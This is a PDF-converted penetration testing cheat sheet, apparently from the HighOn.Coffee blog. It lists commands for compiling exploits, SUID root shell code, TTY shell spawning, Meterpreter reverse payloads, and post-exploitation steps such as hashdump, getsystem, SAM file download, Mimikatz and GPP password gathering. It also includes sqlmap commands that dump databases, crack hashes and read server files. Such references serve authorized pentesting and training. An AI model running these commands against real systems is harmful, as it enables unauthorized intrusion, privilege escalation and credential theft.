Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands


See Linux Commands Cheat Sheet (right hand menu) for a list of Linux
Penetra on tes ng commands, useful for local system enumera on.

Compiling Exploits
Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION

Windows exploit
process.h, string.h, winbase.h, windows.h, winsock2.h
code

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
Linux exploit code
sys/sockt.h, sys/types.h, unistd.h

Build Exploit GCC

Compile exploit gcc.

COMMAND DESCRIPTION

gcc -o exploit exploit.c Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit a acking machines.

COMMAND DESCRIPTION

gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resul ng in a .exe file.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
COMMAND DESCRIPTION

Compile windows
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
.exe on Linux

SUID Binary
O en SUID C binary files are required to spawn a shell as a superuser,
you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}

SUID C Shell for /bin/sh

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for
running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit Cheat Sheet


A basic metasploit cheat sheet that I have found handy for reference.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Basic Metasploit commands, useful for reference, for pivo ng see -
Meterpreter Pivo ng techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

COMMAND DESCRIPTION

set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Windows VNC Meterpreter payload

COMMAND DESCRIPTION

set payload windows/vncinject/reverse_tcp Meterpreter Windows VNC


set ViewOnly false Payload

Linux Reverse Meterpreter payload

COMMAND DESCRIPTION

set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Meterpreter Cheat Sheet
Useful meterpreter commands.

COMMAND DESCRIPTION

Meterpreter upload file to Windows


upload file c:\\windows
target

Meterpreter download file from


download c:\\windows\\repair\\sam /tmp
Windows target

Meterpreter download file from


download c:\\windows\\repair\\sam /tmp
Windows target

Meterpreter run .exe on target -


execute -f c:\\windows\temp\exploit.exe handy for execu ng uploaded
exploits

execute -f cmd -c Creates new channel with cmd shell

ps Meterpreter show processes

shell Meterpreter get shell on the target

Meterpreter a empts priviledge


getsystem
escala on the target

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Meterpreter a empts to dump the
hashdump
hashes on the target

Meterpreter create port forward to


portfwd add –l 3389 –p 3389 –r target
target machine

portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules


Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION

MS08_067 Windows 2k, XP,


use exploit/windows/smb/ms08_067_netapi
2003 Remote Exploit

MS08_040 Windows NT, 2k, XP,


use exploit/windows/dcerpc/ms06_040_netapi
2003 Remote Exploit

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
MS09_050 Windows Vista
use exploit/windows/smb/
SP1/SP2 and Server 2008 (x86)
ms09_050_smb2_negotiate_func_index
Remote Exploit

Local Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION

Bypass UAC on Windows 7 + Set target +


use exploit/windows/local/bypassuac
arch, x86/64

Auxilary Metasploit Modules

COMMAND DESCRIPTION

use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner

Metasploit JBOSS vulnerability


use auxiliary/scanner/http/jboss_vulnscan
scanner

Metasploit MSSQL Creden al


use auxiliary/scanner/mssql/mssql_login
Scanner

Metasploit MSSQL Version


use auxiliary/scanner/mysql/mysql_version
Scanner

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

COMMAND DESCRIPTION

Metasploit powershell
use exploit/multi/script/web_delivery
payload delivery module

Metasploit upload and run


post/windows/manage/powershell/exec_powershell powershell script through a
session

use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escala on.

COMMAND DESCRIPTION

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Metasploit show privileges
run post/windows/gather/win_privs
of current user

Metasploit grab GPP saved


use post/windows/gather/credentials/gpp
passwords

load mimikatz -> wdigest Metasplit load Mimikatz

Ideni y other machines


that the supplied domain
run post/windows/gather/local_admin_search_enum
user has administra ve
access to

Automated dumping of sam


run post/windows/gather/smart_hashdump file, tries to esc privileges
etc

ASCII Table Cheat Sheet


Useful for Web Applica on Penetra on Tes ng, or if you get stranded on
Mars and need to communicate with NASA.

ASCII CHARACTER

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x00 Null Byte

x08 BS

x09 TAB

x0a LF

x0d CR

x1b ESC

x20 SPC

x21 !

x22 "

x23 #

x24 $

x25 %

x26 &

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x27 `

x28 (

x29 )

x2a *

x2b +

x2c ,

x2d -

x2e .

x2f /

x30 0

x31 1

x32 2

x33 3

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x34 4

x35 5

x36 6

x37 7

x38 8

x39 9

x3a :

x3b ;

x3c <

x3d =

x3e >

x3f ?

x40 @

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x41 A

x42 B

x43 C

x44 D

x45 E

x46 F

x47 G

x48 H

x49 I

x4a J

x4b K

x4c L

x4d M

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x4e N

x4f O

x50 P

x51 Q

x52 R

x53 S

x54 T

x55 U

x56 V

x57 W

x58 X

x59 Y

x5a Z

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x5b [

x5c \

x5d ]

x5e ^

x5f _

x60 `

x61 a

x62 b

x63 c

x64 d

x65 e

x66 f

x67 g

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x68 h

x69 i

x6a j

x6b k

x6c l

x6d m

x6e n

x6f o

x70 p

x71 q

x72 r

x73 s

x74 t

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
x75 u

x76 v

x77 w

x78 x

x79 y

x7a z

CISCO IOS Commands


A collec on of useful Cisco IOS commands.

COMMAND DESCRIPTION

enable Enters enable mode

conf t Short for, configure terminal

(config)# interface fa0/0 Configure FastEthernet 0/0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
(config-if)# ip addr 0.0.0.0 255.255.255.255 Add ip to fa0/0

(config-if)# ip addr 0.0.0.0 255.255.255.255 Add ip to fa0/0

(config-if)# line vty 0 4 Configure vty line

(config-line)# login Cisco set telnet password

(config-line)# password YOUR-PASSWORD Set telnet password

Show running config loaded in


# show running-config
memory

# show startup-config Show sartup config

# show version show cisco IOS version

# show session display open sessions

# show ip interface Show network interfaces

# show interface e0 Show detailed interface info

# show ip route Show routes

# show access-lists Show access lists

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
# dir file systems Show available files

# dir all-filesystems File informa on

# dir /all SHow deleted files

# terminal length 0 No limit on terminal output

Copys running config to tp


# copy running-config tftp
server

Copy startup-config to
# copy running-config startup-config
running-config

Cryptography
Hash Lengths

HASH SIZE

MD5 Hash Length 16 Bytes

SHA-1 Hash Length 20 Bytes

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SHA-256 Hash Length 32 Bytes

SHA-512 Hash Length 64 Bytes

Hash Examples

Likely just use hash-identi er for this but here are some example
hashes:

HASH EXAMPLE

MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5

MD5 $PASS:$SALT
01dfae6e5d4d90d9892622325959afbe:7050461
Example

MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426

SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b

SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014

SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
127e6fbfe24a750e72930c220a8e138275656b
SHA-256
8e5d8f48a98c3c92df2caba935

SHA-256 c73d08de890479518ed60cf670d17faa26a4a7
$PASS:$SALT 1f995c1dcc978165399401a6c4

SHA-256 eb368a2dfd38b405f014118c7d9747fcc97f4
$SALT:$PASS f0ee75c05963cd9da6ee65ef498:560407001617

82a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
SHA-512
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f

e5c3ede3e49fb86592fb03f471c35ba13e8
SHA-512 d89b8ab65142c9a8fdafb635fa2223c24e5
$PASS:$SALT 558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd

976b451818634a1e2acba682da3fd6ef
SHA-512 a72adf8a7a08d7939550c244b237c72c7d4236754
$SALT:$PASS 4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a

NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
SQLMap Examples
A mini SQLMap cheat sheet:

COMMAND DESCRIPTION

sqlmap -u http://meh.com --forms --batch --crawl=10 Automated


--cookie=jsessionid=54321 --level=5 --risk=3 sqlmap scan

sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE


Targeted
--level=3 --current-user --current-db --passwords
sqlmap scan
--file-read="/var/www/blah.php"

Scan url for


union + error
based
injec on with
mysql
sqlmap -u "http://meh.com/meh.php?id=1"
backend
--dbms=mysql --tech=U --random-agent --dump
and use a
random user
agent +
database
dump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
sqlmap check
sqlmap -o -u "http://meh.com/form/" --forms form for
injec on

sqlmap dump
and crack
sqlmap -o -u "http://meh/vuln-form" --forms hashes for
-D database-name -T users --dump table users on
database-
name.

Share this on...


 Twi er  Facebook  Google+  Reddit

Follow Arr0way
 Twi er  GitHub

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Also...

You might want to read these


CATEGORY POST NAME

cheat-sheet LFI Cheat Sheet

kali linux HowTo: Kali Linux Chromium Install for Web App Pen Testing

walkthroughs InsomniHack CTF Teaser - Smartcat2 Writeup

walkthroughs InsomniHack CTF Teaser - Smartcat1 Writeup

walkthroughs FristiLeaks 1.3 Walkthrough

walkthroughs SickOS 1.1 - Walkthrough

walkthroughs The Wall Boot2Root Walkthrough

walkthroughs /dev/random: Sleepy Walkthrough CTF

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
walkthroughs /dev/random Pipe walkthrough

walkthroughs Lord of the Root Walkthrough CTF

The contents of this website are © 2018


Proudly hosted by
HighOn.Coffee

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like